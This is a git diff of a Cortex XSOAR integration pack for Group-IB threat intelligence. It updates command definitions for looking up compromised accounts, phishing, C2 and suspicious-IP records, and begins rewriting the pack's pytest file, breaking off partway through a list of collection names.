compromised/mule - osi/git_repository - osi/public_leak - - malware/targeted_malware + - osi/vulnerability + - attacks/ddos + - attacks/deface + - attacks/phishing_group + - attacks/phishing_kit + - suspicious_ip/tor_node + - suspicious_ip/open_proxy + - suspicious_ip/socks_proxy + - suspicious_ip/vpn + - suspicious_ip/scanner + - malware/cnc + - malware/malware + - hi/threat + - hi/threat_actor + - apt/threat_actor + - apt/threat required: false type: 16 - additionalinfo: Date to start fetching incidents from. @@ -51,9 +64,7 @@ configuration: name: first_fetch required: false type: 0 -- additionalinfo: A number of requests per collection that integration sends in one - fetch iteration (each request picks up to 200 incidents). If you face some runtime - errors, lower the value. +- additionalinfo: A number of requests per collection that integration sends in one fetch iteration (each request picks up to 200 incidents). If you face some runtime errors, lower the value. defaultvalue: '3' display: Number of requests per collection hidden: false @@ -70,43 +81,25 @@ configuration: name: incidentType required: false type: 13 -description: "Pack helps to integrate Group-IB Threat Intelligence and get incidents\ - \ directly into Cortex XSOAR. \nThe list of included collections: \nCompromised\ - \ Accounts, Compromised Cards, Brand Protection Phishing, Brand Protection Phishing\ - \ Kit, OSI Git Leak, OSI Public Leak, Targeted Malware." -detaileddescription: "### Group-IB Threat Intelligence\n \n \n- This section explains\ - \ how to configure the instance of Threat Intelligence in Cortex XSOAR. \n \n\ - 1. Open Group-IB TI web interface. (It may be either new interface: [https://tap.group-ib.com](https://tap.group-ib.com))\ - \ \n2. To generate API key(password): \n2.1. In the new interface: click on your\ - \ name in the right upper corner -> choose **Profile** option -> switch to **Security\ - \ and Access** tab -> click **Personal token** -> follow instructions to generate\ - \ API token. \n3. Your server URL is the same as your TI web interface URL. \n\ - 4. Your username is the email that you use to enter in the web interface.\n5. Set\ - \ classifier and mapper with Group-IB Threat Intelligence classifier and mapper\ - \ or with our own if you want so.\n6. Go to Settings->Integrations->Pre-Processing\ - \ Rules and set up the pre-processing rule:\n* Set up conditions: \"gibid Is not\ - \ empty (General)\" and \"Type Doesn't equal(String) GIB Data Breach\".\n* Action:\ - \ \"Run a script\".\n* Script: \"GIBIncidentUpdate\" (will recreate closed incidents\ - \ if they get an update, in other cases will update the existing one) or \"GIBIncidentUpdateIncludingClosed\"\ - (will only update incidents). \n7. Don't forget to contact Group-IB to add to allow\ - \ list your Cortex IP or public IP of a proxy that you are using with Cortex." +- display: Hunting Rules + name: hunting_rules + defaultvalue: "false" + type: 8 + required: false + additionalinfo: To enable the collection of data using hunting rules, please select this parameter. +description: "Pack helps to integrate Group-IB Threat Intelligence and get incidents directly into Cortex XSOAR. \nThe list of included collections: \nCompromised Accounts, Compromised Cards, Brand Protection Phishing, Brand Protection Phishing Kit, OSI Git Leak, OSI Public Leak, Targeted Malware." +detaileddescription: "### Group-IB Threat Intelligence\n \n \n- This section explains how to configure the instance of Threat Intelligence in Cortex XSOAR. \n \n1. Open Group-IB TI web interface. (It may be either new interface: [https://tap.group-ib.com](https://tap.group-ib.com)) \n2. To generate API key(password): \n2.1. In the new interface: click on your name in the right upper corner -> choose **Profile** option -> switch to **Security and Access** tab -> click **Personal token** -> follow instructions to generate API token. \n3. Your server URL is the same as your TI web interface URL. \n4. Your username is the email that you use to enter in the web interface.\n5. Set classifier and mapper with Group-IB Threat Intelligence classifier and mapper or with our own if you want so.\n6. Go to Settings->Integrations->Pre-Processing Rules and set up the pre-processing rule:\n* Set up conditions: \"gibid Is not empty (General)\" and \"Type Doesn't equal(String) GIB Data Breach\".\n* Action: \"Run a script\".\n* Script: \"GIBIncidentUpdate\" (will recreate closed incidents if they get an update, in other cases will update the existing one) or \"GIBIncidentUpdateIncludingClosed\"(will only update incidents). \n7. Don't forget to contact Group-IB to add to allow list your Cortex IP or public IP of a proxy that you are using with Cortex." display: Group-IB Threat Intelligence name: Group-IB Threat Intelligence & Attribution script: commands: - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: 253b9a136f0d574149fc43691eaf7ae27aff141a. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in compromised/account collection - with provided ID. - execution: false + description: Command performs Group IB event lookup in compromised/account collection with provided ID. name: gibtia-get-compromised-account-info outputs: - contextPath: GIBTIA.CompromisedAccount.client.ipv4.asn @@ -179,101 +172,16 @@ script: description: Event severity. type: String - arguments: - - default: false - description: |- - GIB event id. - e.g.: ecda6f4dc85596f447314ce01e2152db9c9d3cbc. - isArray: false - name: id - required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in compromised/card collection - with provided ID. - execution: false - name: gibtia-get-compromised-card-info - outputs: - - contextPath: GIBTIA.CompromisedCard.cardInfo.cvv - description: Compromised card CVV. - type: String - - contextPath: GIBTIA.CompromisedCard.cardInfo.issuer.issuer - description: Card issuer. - type: String - - contextPath: GIBTIA.CompromisedCard.cardInfo.number - description: Compromised card number. - type: String - - contextPath: GIBTIA.CompromisedCard.cardInfo.system - description: Payment system. - type: String - - contextPath: GIBTIA.CompromisedCard.cardInfo.type - description: Internal issuer card type. - type: String - - contextPath: GIBTIA.CompromisedCard.cardInfo.validThru - description: Card expiration date. - type: String - - contextPath: GIBTIA.CompromisedCard.client.ipv4.asn - description: Compromised client ASN. - type: String - - contextPath: GIBTIA.CompromisedCard.client.ipv4.countryName - description: Country name. - type: String - - contextPath: GIBTIA.CompromisedCard.client.ipv4.ip - description: Victim IP address. - type: String - - contextPath: GIBTIA.CompromisedCard.client.ipv4.region - description: Region name. - type: String - - contextPath: GIBTIA.CompromisedCard.dateCompromised - description: Date of compromise. - type: Date - - contextPath: GIBTIA.CompromisedCard.dateDetected - description: Date detected. - type: Date - - contextPath: GIBTIA.CompromisedCard.malware.name - description: Related malware name. - type: String - - contextPath: GIBTIA.CompromisedCard.malware.id - description: Related GIB malware ID. - type: String - - contextPath: GIBTIA.CompromisedCard.portalLink - description: Link to GIB incident. - type: String - - contextPath: GIBTIA.CompromisedCard.threatActor.name - description: Associated threat actor. - type: String - - contextPath: GIBTIA.CompromisedCard.threatActor.isAPT - description: Is threat actor APT group. - type: Boolean - - contextPath: GIBTIA.CompromisedCard.threatActor.id - description: Threat actor GIB ID. - type: String - - contextPath: GIBTIA.CompromisedCard.id - description: Group IB incident ID. - type: String - - contextPath: GIBTIA.CompromisedCard.sourceType - description: Information source. - type: String - - contextPath: GIBTIA.CompromisedCard.evaluation.severity - description: Event severity. - type: String - - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: 50a3b4abbfca5dcbec9c8b3a110598f61ba93r33. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in compromised/mule collection - with provided ID. - execution: false + description: Command performs Group IB event lookup in compromised/mule collection with provided ID. name: gibtia-get-compromised-mule-info outputs: - contextPath: GIBTIA.CompromisedMule.account - description: Account number (card/phone), which was used by threat actor to - cash out. + description: Account number (card/phone), which was used by threat actor to cash out. type: String - contextPath: GIBTIA.CompromisedMule.cnc.ipv4.asn description: CNC ASN. @@ -321,90 +229,12 @@ script: description: Event severity. type: String - arguments: - - default: false - description: |- - GIB event id. - e.g.: 0c1426048474df19ada9d0089ef8b3efce906556. - isArray: false - name: id - required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in compromised/imei collection - with provided ID. - execution: false - name: gibtia-get-compromised-imei-info - outputs: - - contextPath: GIBTIA.CompromisedIMEI.client.ipv4.asn - description: Compromised client ASN. - type: String - - contextPath: GIBTIA.CompromisedIMEI.client.ipv4.countryName - description: Country name. - type: String - - contextPath: GIBTIA.CompromisedIMEI.client.ipv4.ip - description: Victim IP address. - type: String - - contextPath: GIBTIA.CompromisedIMEI.client.ipv4.region - description: Region name. - type: String - - contextPath: GIBTIA.CompromisedIMEI.cnc.domain - description: CNC URL. - type: String - - contextPath: GIBTIA.CompromisedIMEI.cnc.ipv4.asn - description: CNC ASN. - type: String - - contextPath: GIBTIA.CompromisedIMEI.cnc.ipv4.countryName - description: CNC IP country name. - type: String - - contextPath: GIBTIA.CompromisedIMEI.cnc.ipv4.ip - description: CNC IP address. - type: String - - contextPath: GIBTIA.CompromisedIMEI.cnc.ipv4.region - description: CNC region name. - type: String - - contextPath: GIBTIA.CompromisedIMEI.dateCompromised - description: Date compromised. - type: Date - - contextPath: GIBTIA.CompromisedIMEI.dateDetected - description: Date detected. - type: Date - - contextPath: GIBTIA.CompromisedIMEI.device.imei - description: Compromised IMEI. - type: String - - contextPath: GIBTIA.CompromisedIMEI.device.model - description: Compromised device model. - type: String - - contextPath: GIBTIA.CompromisedIMEI.malware.name - description: Associated malware. - type: String - - contextPath: GIBTIA.CompromisedIMEI.threatActor.id - description: Associated threat actor ID. - type: String - - contextPath: GIBTIA.CompromisedIMEI.threatActor.name - description: Associated threat actor. - type: String - - contextPath: GIBTIA.CompromisedIMEI.threatActor.isAPT - description: Is threat actor APT group. - type: Boolean - - contextPath: GIBTIA.CompromisedIMEI.id - description: Group IB incident ID. - type: String - - contextPath: GIBTIA.CompromisedIMEI.evaluation.severity - description: Event severity. - type: String - - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: 6fd344f340f4bdc08548cb36ded62bdf. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in compromised/breached collection - with provided ID. - execution: false + description: Command performs Group IB event lookup in compromised/breached collection with provided ID. name: gibtia-get-compromised-breached-info outputs: - contextPath: GIBTIA.DataBreach.email @@ -426,18 +256,12 @@ script: description: Event severity. type: String - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: f201c253ac71f7d78db39fa111a2af9d7ee7a3f7. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in osi/git_leak collection - with provided ID. - execution: false + description: Command performs Group IB event lookup in osi/git_leak collection with provided ID. name: gibtia-get-osi-git-leak-info outputs: - contextPath: GIBTIA.GitLeak.dateDetected @@ -474,18 +298,12 @@ script: description: Event severity. type: String - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: a9a5b5cb9b971a2a037e3a0a30654185ea148095. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in osi/public_leak collection - with provided ID. - execution: false + description: Command performs Group IB event lookup in osi/public_leak collection with provided ID. name: gibtia-get-osi-public-leak-info outputs: - contextPath: GIBTIA.PublicLeak.created @@ -525,19 +343,13 @@ script: description: Event severity. type: String - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: CVE-2021-27152. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in osi/vulnerability collection - with provided ID. - execution: false + description: Command performs Group IB event lookup in osi/vulnerability collection with provided ID. name: gibtia-get-osi-vulnerability-info outputs: - contextPath: GIBTIA.OSIVulnerability.affectedSoftware.name @@ -580,138 +392,12 @@ script: description: Event severity. type: String - arguments: - - default: false - description: |- - GIB event id. - e.g.: 044f3f2cb599228c1882884eb77eb073f68a25f2. - isArray: false - name: id - required: false - secret: false - deprecated: false - description: Command performs Group IB event lookup in bp/phishing_kit and attacks/phishing_kit - collections with provided ID. - execution: false - name: gibtia-get-phishing-kit-info - outputs: - - contextPath: GIBTIA.PhishingKit.dateDetected - description: Phishing kit detection date. - type: Date - - contextPath: GIBTIA.PhishingKit.dateFirstSeen - description: Phishing kit first seen date. - type: Date - - contextPath: GIBTIA.PhishingKit.dateLastSeen - description: Phishing kit last seen date. - type: Date - - contextPath: GIBTIA.PhishingKit.downloadedFrom.fileName - description: Phishing kit filename. - type: String - - contextPath: GIBTIA.PhishingKit.downloadedFrom.domain - description: Phishing kit domain. - type: String - - contextPath: GIBTIA.PhishingKit.downloadedFrom.date - description: Downloading date. - type: Date - - contextPath: GIBTIA.PhishingKit.downloadedFrom.url - description: URL where phishing kit were downloaded from. - type: String - - contextPath: GIBTIA.PhishingKit.hash - description: MD5 phishing kit hash. - type: String - - contextPath: GIBTIA.PhishingKit.portalLink - description: Link to kit on GIB TI&A. - type: String - - contextPath: GIBTIA.PhishingKit.targetBrand - description: Phishing kit target brand. - type: String - - contextPath: GIBTIA.PhishingKit.emails - description: Emails found in phishing kit. - type: String - - contextPath: GIBTIA.PhishingKit.id - description: GIB event ID. - type: String - - contextPath: GIBTIA.PhishingKit.evaluation.severity - description: Event severity. - type: String - - arguments: - - default: false - description: |- - GIB event id. - e.g.: fce7f92d0b64946cf890842d083953649b259952. - isArray: false - name: id - required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in bp/phishing and attacks/phishing - collections with provided ID. - execution: false - name: gibtia-get-phishing-info - outputs: - - contextPath: GIBTIA.Phishing.dateDetected - description: Date of phishing detection. - type: Date - - contextPath: GIBTIA.Phishing.dateBlocked - description: Phishing resource block date. - type: Unknown - - contextPath: GIBTIA.Phishing.id - description: GIB incident ID. - type: String - - contextPath: GIBTIA.Phishing.ipv4.asn - description: Phishing resource ASN. - type: String - - contextPath: GIBTIA.Phishing.ipv4.countryName - description: Phishing resource country name. - type: String - - contextPath: GIBTIA.Phishing.ipv4.ip - description: Phishing resource IP address. - type: String - - contextPath: GIBTIA.Phishing.ipv4.region - description: Phishing resource region name. - type: String - - contextPath: GIBTIA.Phishing.phishingDomain.domain - description: Phishing domain. - type: String - - contextPath: GIBTIA.Phishing.phishingDomain.dateRegistered - description: Phishing domain creation date. - type: Date - - contextPath: GIBTIA.Phishing.phishingDomain.registrar - description: Phishing domain registrar name. - type: String - - contextPath: GIBTIA.Phishing.phishingDomain.title - description: Phishing domain title. - type: String - - contextPath: GIBTIA.Phishing.targetBrand - description: Phishing target name. - type: String - - contextPath: GIBTIA.Phishing.targetCategory - description: Phishing target category (financial, government, etc.) - type: String - - contextPath: GIBTIA.Phishing.targetDomain - description: Phishing target domain. - type: String - - contextPath: GIBTIA.Phishing.status - description: Current status of phishing incident (blocked, in response, etc.) - type: String - - contextPath: GIBTIA.Phishing.url - description: Phishing URL. - type: String - - contextPath: GIBTIA.Phishing.evaluation.severity - description: Event severity. - type: String - - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: 26a05baa4025edff367b058b13c6b43e820538a5. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in attacks/ddos collection - with provided ID. - execution: false + description: Command performs Group IB event lookup in attacks/ddos collection with provided ID. name: gibtia-get-attacks-ddos-info outputs: - contextPath: GIBTIA.AttacksDDoS.cnc.url @@ -766,18 +452,12 @@ script: description: Event severity. type: String - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: 6009637a1135cd001ef46e21. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in attacks/deface collection - with provided ID. - execution: false + description: Command performs Group IB event lookup in attacks/deface collection with provided ID. name: gibtia-get-attacks-deface-info outputs: - contextPath: GIBTIA.AttacksDeface.date @@ -811,29 +491,19 @@ script: description: Event severity. type: String - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: 1b09d389d016121afbffe481a14b30ea995876e4. - isArray: false name: id required: true - secret: false - - auto: PREDEFINED - default: false - defaultValue: 'false' - description: Is threat APT. - isArray: false - name: isAPT + - name: isAPT + auto: PREDEFINED predefined: - - 'true' - - 'false' - required: false - secret: false - deprecated: false - description: Command performs Group IB event lookup in hi/threat (or in apt/threat - if the APT flag is true) collection with provided ID. - execution: false + - "true" + - "false" + description: Is threat APT. + defaultValue: "false" + description: Command performs Group IB event lookup in hi/threat (or in apt/threat if the APT flag is true) collection with provided ID. name: gibtia-get-threat-info outputs: - contextPath: GIBTIA.Threat.contacts.account @@ -942,29 +612,19 @@ script: description: Event severity. type: String - arguments: - - default: false - description: |- + - description: |- GIB internal threatActor ID. e.g.: 0d4496592ac3a0f5511cd62ef29887f48d9cb545. - isArray: false name: id required: true - secret: false - - auto: PREDEFINED - default: false - defaultValue: 'false' - description: Is threat actor APT group. - isArray: false - name: isAPT + - name: isAPT + auto: PREDEFINED predefined: - - 'true' - - 'false' - required: false - secret: false - deprecated: false - description: Command performs Group IB event lookup in hi/threat_actor (or in - apt/threat_actor if the APT flag is true) collection with provided ID. - execution: false + - "true" + - "false" + description: Is threat actor APT group. + defaultValue: "false" + description: Command performs Group IB event lookup in hi/threat_actor (or in apt/threat_actor if the APT flag is true) collection with provided ID. name: gibtia-get-threat-actor-info outputs: - contextPath: GIBTIA.ThreatActor.aliases @@ -1025,18 +685,12 @@ script: description: Sectors attacked by threat actor. type: String - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: 109.70.100.46. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in suspicious_ip/tor_node - collection with provided ID. - execution: false + description: Command performs Group IB event lookup in suspicious_ip/tor_node collection with provided ID. name: gibtia-get-suspicious-ip-tor-node-info outputs: - contextPath: GIBTIA.SuspiciousIPTorNode.ipv4.asn @@ -1058,18 +712,12 @@ script: description: Event severity. type: String - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: cc6a2856da2806b03839f81aa214f22dbcfd7369. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in suspicious_ip/open_proxy - collection with provided ID. - execution: false + description: Command performs Group IB event lookup in suspicious_ip/open_proxy collection with provided ID. name: gibtia-get-suspicious-ip-open-proxy-info outputs: - contextPath: GIBTIA.SuspiciousIPOpenProxy.ipv4.asn @@ -1100,18 +748,12 @@ script: description: Event severity. type: String - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: 02e385600dfc5bf9b3b3656df8e0e20f5fc5c86e. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in suspicious_ip/socks_proxy - collection with provided ID. - execution: false + description: Command performs Group IB event lookup in suspicious_ip/socks_proxy collection with provided ID. name: gibtia-get-suspicious-ip-socks-proxy-info outputs: - contextPath: GIBTIA.SuspiciousIPSocksProxy.ipv4.asn @@ -1132,93 +774,20 @@ script: - contextPath: GIBTIA.SuspiciousIPSocksProxy.evaluation.severity description: Event severity. type: String - - arguments: - - default: false - description: |- - GIB event id. - e.g.: 5bbd38acf0b9e4f04123af494d485f6c49221e98. - isArray: false - name: id - required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in malware/targeted_malware - collection with provided ID. - execution: false - name: gibtia-get-malware-targeted-malware-info - outputs: - - contextPath: GIBTIA.TargetedMalware.date - description: Date malware detected. - type: Date - - contextPath: GIBTIA.TargetedMalware.fileName - description: Malware file name. - type: String - - contextPath: GIBTIA.TargetedMalware.fileType - description: Malware file type. - type: String - - contextPath: GIBTIA.TargetedMalware.id - description: GIB internal incident ID. - type: String - - contextPath: GIBTIA.TargetedMalware.injectDump - description: Inject dump. - type: String - - contextPath: GIBTIA.TargetedMalware.injectMd5 - description: MD5 hash of injection dump. - type: String - - contextPath: GIBTIA.TargetedMalware.malware.name - description: GIB internal malware ID. - type: String - - contextPath: GIBTIA.TargetedMalware.md5 - description: MD5 hash of malware file. - type: String - - contextPath: GIBTIA.TargetedMalware.sha1 - description: SHA1 hash of malware file. - type: String - - contextPath: GIBTIA.TargetedMalware.sha256 - description: SHA256 hash of malware file. - type: String - - contextPath: GIBTIA.TargetedMalware.size - description: Malware size in bytes. - type: Number - - contextPath: GIBTIA.TargetedMalware.source - description: Malware source. - type: String - - contextPath: GIBTIA.TargetedMalware.portalLink - description: GIB portal incident link. - type: String - - contextPath: GIBTIA.TargetedMalware.threatActor.name - description: Related threat actor. - type: String - - contextPath: GIBTIA.TargetedMalware.threatActor.id - description: GIB internal threat actor ID. - type: String - - contextPath: GIBTIA.TargetedMalware.threatActor.isAPT - description: Is threat actor APT. - type: Boolean - - contextPath: GIBTIA.TargetedMalware.evaluation.severity - description: Event severity. - type: String - - deprecated: false + - arguments: [] description: Returns list of available collections. - execution: false name: gibtia-get-available-collections outputs: - contextPath: GIBTIA.OtherInfo.collections description: List of availiable collections. type: String - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: aeed277396e27e375d030a91533aa232444d0089. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in malware/cnc collection - by provided ID. - execution: false + description: Command performs Group IB event lookup in malware/cnc collection by provided ID. name: gibtia-get-malware-cnc-info outputs: - contextPath: GIBTIA.MalwareCNC.dateDetected @@ -1261,17 +830,12 @@ script: description: GIB event ID. type: String - arguments: - - default: false - description: |- + - description: |- Query you want to search. e.g.: 8.8.8.8. - isArray: false name: query required: true - secret: false - deprecated: false description: Command performs global Group IB search. - execution: false name: gibtia-global-search outputs: - contextPath: apiPath @@ -1284,59 +848,44 @@ script: description: Link to GIB TI&A interface. type: String - arguments: - - auto: PREDEFINED - default: false - description: Collection you want to search. - isArray: false + - description: |- + Collection you want to search. name: collection_name + required: true + auto: PREDEFINED predefined: - - compromised/account - - compromised/card + - compromised/account_group + - compromised/bank_card_group + - compromised/breached - compromised/mule - - compromised/imei + - osi/git_repository + - osi/public_leak + - osi/vulnerability - attacks/ddos - attacks/deface - - attacks/phishing + - attacks/phishing_group - attacks/phishing_kit - - bp/phishing - - bp/phishing_kit - - hi/threat - - hi/threat_actor - - apt/threat - - apt/threat_actor - - osi/git_leak - - osi/vulnerability - - osi/public_leak - suspicious_ip/tor_node - suspicious_ip/open_proxy - suspicious_ip/socks_proxy + - suspicious_ip/vpn + - suspicious_ip/scanner - malware/cnc - - malware/targeted_malware + - malware/malware + - hi/threat + - hi/threat_actor + - apt/threat_actor + - apt/threat + - name: query required: true - secret: false - - default: false description: |- Query you want to search. e.g.: 8.8.8.8. - isArray: false - name: query - required: true - secret: false - - default: false + - name: date_from description: Start date of search session. - isArray: false - name: date_from - required: false - secret: false - - default: false + - name: date_to description: End date of search session. - isArray: false - name: date_to - required: false - secret: false - deprecated: false description: Command performs Group IB search in selected collection. - execution: false name: gibtia-local-search outputs: - contextPath: id @@ -1345,7 +894,35 @@ script: - contextPath: additional_info description: Additional info about feed. type: String - dockerimage: demisto/python3:3.11.10.116949 + - arguments: + - description: 'GIB event id.e.g.: 192.168.0.1.' + name: id + description: Command performs Group IB event lookup in suspicious_ip/vpn collection by provided ID. + name: gibtia-get-suspicious-ip-vpn-info + - description: Command performs Group IB event lookup in suspicious_ip/scanner collection by provided ID. + name: gibtia-get-suspicious-ip-scanner-info + arguments: + - name: id + description: 'GIB event id.e.g.: 192.168.0.1.' + - arguments: + - description: 'GIB event id.e.g.: 653654fb986b47a31c73d92f4a20a273acd2f779.' + name: id + description: Command performs Group IB event lookup in malware/malware collection by provided ID. + name: gibtia-get-malware-malware-info + - arguments: + - description: |- + GIB event id. + name: id + required: true + description: Command performs Group IB event lookup in compromised/bank_card_group collection by provided ID. + name: gibtia-get-compromised-card-group-info + - arguments: + - description: GIB event id. + name: id + required: true + description: Command performs Group IB event lookup in attacks/phishing_group collection by provided ID. + name: gibtia-get-phishing-group-info + dockerimage: demisto/vendors-sdk:1.0.0.2073752 feed: false isfetch: true longRunning: false diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py index da3e608017f7..38558fd82581 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py @@ -1,439 +1,203 @@ import pytest +from GroupIBTIA import ( + fetch_incidents_command, + Client, + main, + get_available_collections_command, +) +from urllib3.exceptions import InsecureRequestWarning +from urllib3 import disable_warnings as urllib3_disable_warnings +import GroupIBTIA from json import load -from GroupIBTIA import fetch_incidents_command, Client, transform_function, main, get_available_collections_command - -with open('test_data/example.json') as example: - RAW_JSON = load(example) -with open('test_data/results.json') as results: - RESULTS = load(results) - -# Because of errors with markdown tables -RESULTS.update({ - 'osi/git_repository': ( - ({'last_fetch': {'osi/git_repository': 1611862631144674}}, - [{'name': 'Git Leak: https://github.com/somegit', - 'occurred': '2021-01-28T22:32:54Z', - 'rawJSON': '{"company": [], "companyId": [3150], "contributors": ' - '[{"authorEmail": "some@email.com", "authorName": "somename"}, ' - '{"authorEmail": "some@email.com", "authorName": "somename"}, ' - '{"authorEmail": "some@email.com", "authorName": "somename"}], ' - '"dataFound": {"password": 8, "apikey": 2, "secret": 1}, ' - '"dateCreated": "2021-01-23T22:12:58+03:00", "dateDetected": ' - '"2021-01-28T22:32:54+03:00", "evaluation": {"admiraltyCode": ' - '"A1", "credibility": 50, "reliability": 50, "severity": ' - '"orange", "tlp": "amber", "ttl": 30}, "favouriteForCompanies": ' - '[], "files": "| URL | Author Email | Author Name | Date ' - 'Created| TimeStamp |\\n| ---- | --------------- | ' - '------------ | ----------- | ------------ |\\n| ' - 'https://github.com/somegit | some@email.com | TEST | ' - '1970-01-01T03:00:00+03:00 | [1611429178] |\\n", ' - '"hideForCompanies": [], "id": ' - '"21aed9b86d2e6cbb15180d803a84f6d27f673db4", ' - '"ignoreForCompanies": [], "isFavourite": false, "isHidden": ' - 'false, "isIgnore": false, "matchesTypes": [], "name": "Git ' - 'Leak: https://github.com/somegit", "numberOf": {"contributors": ' - '3, "files": 10}, "relations": {"infobip.com": "some.com", ' - '"Infobip": "some"}, "seqUpdate": 1611862631144674, "source": ' - '"github", "gibType": "osi/git_repository", ' - '"relatedIndicatorsData": [], "systemSeverity": 2}'}])), - 'osi/public_leak': ( - {'last_fetch': {'osi/public_leak': 1601909532153438}}, - [ - { - 'name': 'Public Leak: a9a5b5cb9b971a2a037e3a0a30654185ea148095', - 'occurred': '2020-10-05T17:51:31Z', - 'rawJSON': '{"bind": [], "created": "2020-10-05T17:51:31+03:00", "data": ' - '"Pasted at: 05/10/2020 15:45", "displayOptions": null, ' - '"evaluation": {"admiraltyCode": "C3", "credibility": 50, ' - '"reliability": 50, "severity": "orange", "tlp": "amber", "ttl": ' - '30}, "hash": "a9a5b5cb9b971a2a037e3a0a30654185ea148095", "id": ' - '"a9a5b5cb9b971a2a037e3a0a30654185ea148095", "language": "c", ' - '"linkList": "| Author | Date Detected | Date Published | Hash | Link | Source |\\n' - '| ------ | ------------- | -------------- | ---- |----- | ------ |\\n| whaaaaaat | ' - '2020-10-05T17:51:31+03:00 | 2020-10-05T17:45:46+03:00 | ' - '3066db9f57b7997607208fedc45d7203029d9cb3 | ' - '[https://some.ru](https://some.ru) | some.ru ' - '|\\n", "matches": "| Type | Sub Type | Value |\\n| ---- | -------- | ----- |\\n| email ' - '| email | some@gmail.ru |\\n", ' - '"oldId": null, ' - '"portalLink": "https://bt.group-ib.com/osi/public_leak?' - 'searchValue=id:a9a5b5cb9b971a2a037e3a0a30654186ea248094", ' - '"seqUpdate": 1601909532153438, "size": "345 B", "updated": ' - '"2020-10-05T17:51:31+03:00", "useful": 1, "name": ' - '"Public Leak: a9a5b5cb9b971a2a037e3a0a30654185ea148095", "gibType": ' - '"osi/public_leak", "relatedIndicatorsData": [], "systemSeverity": 2}' - } - ] - ), - 'bp/phishing_kit': ( - {'last_fetch': {'bp/phishing_kit': [1614921031175]}}, - [ - {'name': 'Phishing Kit: 8d7ea805fe20d6d77f57e2f0cadd17b1', - 'occurred': '2021-01-14T12:10:41Z', - 'rawJSON': '{"dateDetected": "2021-01-14T12:10:41+00:00", "dateFirstSeen": "2021-01-14T13:10:41+00:00", ' - '"dateLastSeen": "2021-01-14T14:12:17+00:00", "downloadedFrom": "| URL | File Name ' - '| Domain | Date |\\n| --- | --------- | ------ | ---- |\\n' - '| https://some.ru | show.zip | some.ru | 2021-01-21 10:10:41 |\\n' - '| https://some.ru | show.zip | "some.ru" ' - '| 2021-01-21 10:10:41 |\\n| https://some.ru | show.zip ' - '| some.ru | 2021-01-21 10:10:41 |\\n", ' - '"emails": [], "evaluation": {"admiraltyCode": "B2", "credibility": 70, ' - '"reliability": 80, "severity": "orange", "tlp": "amber", "ttl": ' - '30}, "hash": "8d7ea805fe20d6d77f57e2f0cadd17b1", "id": ' - '"044f3f2cb599228c1882884eb77eb073f68a25f2", "isFavourite": ' - 'false, "isHidden": false, "oldId": "396793696", "path": ' - '"https://tap.group-ib.com/api/api/v2/web/attacks/phishing_kit' - '/044f3f2cb599228c1882884eb77eb073f68a25f2/file' - '/95b61a1df152012abb79c3951ed98680e0bd917bbcf1d440e76b66a120292c76", ' - '"portalLink": "https://bt.group-ib.com/attacks/phishing_kit?searchValue=' - 'id:044f3f2cb599228c1882884eb77eb073f68a25f2", ' - '"seqUpdate": 1614921031175, "targetBrand": [], "tsFirstSeen": ' - 'null, "tsLastSeen": null, "variables": null, "name": ' - '"Phishing Kit: 8d7ea805fe20d6d77f57e2f0cadd17b1", "gibType": ' - '"bp/phishing_kit", "relatedIndicatorsData": [[]], ' - '"systemSeverity": 2}'}]), -}) -COLLECTION_NAMES = ['compromised/card', 'osi/git_repository', 'osi/public_leak', - 'bp/phishing', 'bp/phishing_kit', 'malware/targeted_malware', "compromised/breached", - "compromised/account_group"] - - -@pytest.fixture(scope='function', params=COLLECTION_NAMES, ids=COLLECTION_NAMES) +import os + +realpath = os.path.join(os.path.dirname(os.path.realpath(__file__))) + +with open(f'{realpath}/test_data/main_collections_examples.json') as example: + COLLECTIONS_RAW_JSON = load(example) + +with open(f'{realpath}/test_data/search_example.json') as example: + SEARCH_RAW_JSON = load(example) + +with open(f'{realpath}/test_data/avalible_collections_example.json') as example: + AVALIBLE_COLLECTIONS_RAW_JSON = load(example) + +# Disable insecure warnings +urllib3_disable_warnings(InsecureRequestWarning) + + +COLLECTION_NAMES = [ + "compromised/account_group", + "compromised/bank_card_group", + "compromised/mule", + "osi/git_repository", + "osi/vulnerability", + "attacks/ddos", + "attacks/deface", + "attacks/phishing_group", + "attacks/phishing_kit", + "suspicious_ip/tor_node", + "suspicious_ip/open_proxy", + "suspicious_ip/socks_proxy", + "suspicious_ip/vpn", + 